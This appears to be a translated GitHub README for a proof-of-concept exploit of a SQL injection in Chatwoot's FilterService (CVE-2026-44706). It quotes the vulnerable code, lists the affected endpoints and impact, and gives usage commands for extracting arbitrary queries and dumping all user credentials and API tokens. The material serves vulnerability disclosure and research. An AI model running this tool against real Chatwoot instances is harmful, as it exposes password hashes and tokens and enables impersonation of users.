hakaioffsec/CVE-2026-44706

GitHub: hakaioffsec/CVE-2026-44706

针对 Chatwoot FilterService SQL 注入漏洞(CVE-2026-44706)的概念验证利用程序,支持注入检测、数据提取和凭证导出。

Stars: 6 | Forks: 0

# Chatwoot FilterService 中的 SQL 注入 这是 CVE-2026-44706 的概念验证漏洞利用程序。CVE-2026-44706 是 Chatwoot 的 `FilterService#lt_gt_filter_values` 中存在的一个 SQL 注入漏洞,允许任何经过身份验证的 agent 读取整个 PostgreSQL 数据库,包括用户凭证和 API token。阅读完整文章请点击[这里](https://hakaisecurity.io/en-cve-2026-44706-sql-injection-in-chatwoot-filterservice/research-blog/)。 用法: ``` # 验证注入 (boolean-based) $ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check # Time-based 确认 $ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased # 提取任意 SQL 查询结果 $ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()" # 导出所有用户凭据和 API tokens $ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds ``` ## 受影响版本 - Chatwoot ≤ 4.11.1 ## 根本原因 在 `app/services/filter_service.rb`(第 91 行)中,用户输入被直接插入到 SQL 中,而没有进行参数化: ``` def lt_gt_filter_values(query_hash) value = query_hash['values'][0] # ← user input, no sanitization operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>' "#{operator} '#{value}'::#{attribute_data_type}" # ← raw interpolation end ``` 该类中的其他所有操作符都使用了绑定参数(`:value_N`)。只有 `is_greater_than` 和 `is_less_than` 存在漏洞。 ## 受影响的 Endpoint - `POST /api/v1/accounts/:id/conversations/filter` - `POST /api/v1/accounts/:id/contacts/filter` ## 影响 CWE-89 SQL 注入。任何经过身份验证的 agent/admin 都可以: - **读取整个数据库** - 用户、消息、token、跨账户数据 - **窃取凭证** - bcrypt 哈希值,用于离线破解 - **窃取 API token** - 冒充任何用户,包括 SuperAdmin - **DoS** - 使用 `pg_sleep()` 耗尽数据库连接 ## CVSS **8.8 高危** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` # 免责声明 此工具仅用于教育和研究目的。请仅在您拥有或获得明确测试授权的系统上使用。对于因使用本程序而造成的任何滥用或损害,作者不承担任何责任。 # Hakai Security [Hakai Security](https://hakaisecurity.io/) 是一家由安全专业人员创立的网络安全公司,致力于追求技术卓越。我们提供量身定制的安全解决方案,包括高级渗透测试、真实的 Red Team 模拟以及安全开发实践,以主动保护客户的资产免受不断演变的网络威胁。 # Hacking Club [Hacking Club](https://hackingclub.com/) 是一个实战培训平台,您可以通过由我们安全咨询公司的专家创建的实操课程、实验室和挑战来学习网络安全:从真实的战场直接带入您的训练中。快来通过 Hacking Club 实践本仓库中展示的漏洞吧![了解更多](https://app.hackingclub.com/training/challenges/126)
标签:Chatwoot, CISA项目, PoC, 多线程, 暴力破解, 测试用例, 逆向工具